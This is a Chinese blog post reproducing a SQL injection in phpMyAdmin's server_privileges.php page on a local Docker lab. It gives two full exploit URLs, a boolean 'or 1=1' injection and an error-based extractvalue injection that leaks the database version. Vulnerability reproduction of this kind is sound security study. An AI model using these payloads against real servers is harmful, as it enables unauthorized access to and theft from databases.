CVE-2020-0554 phpMyAdmin后台注入复现

漏洞复现 SQL注入
漏洞复现
发布日期:   2020-03-13

CVE-2020-0554 phpMyAdmin后台注入漏洞复现

影响版本

phpMyAdmin 4 < 4.9.4

phpMyAdmin 5 < 5.0.1

利用前提

已知一个用户名及密码

环境

使用docker搭建

复现

存在漏洞页面:server_privileges.php

设置变量ajax_requests=true

validate_username 为真值

变量username为注入点

构造payload:
http://127.0.0.1:8080/server_privileges.php?ajax_requests=true&validate_username=1&username=1%27or%201=1%20--+db=&token=f4e0c35c4b314de5bdc84cb46c0aaa17&viewing_mode=server

可以看到页面显示Your SQL query has been executed successfully.只告诉我们成功执行。所以利用报错注入获取信息。

payload:
http://127.0.0.1:8080/server_privileges.php?ajax_request=true&validate_username=1&username=1%27and%20extractvalue(1,concat(0x7e,version()))--+db=&token=f4e0c35c4b314de5bdc84cb46c0aaa17&viewing_mode=server

注入成功。

文章作者: Danie1
文章链接: https://danie1233.github.io/2020/03/13/CVE-2020-0554%20%20phpMyAdmin%E5%90%8E%E5%8F%B0%E6%B3%A8%E5%85%A5%E5%A4%8D%E7%8E%B0/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Danie1 !
漏洞复现 SQL注入
  目录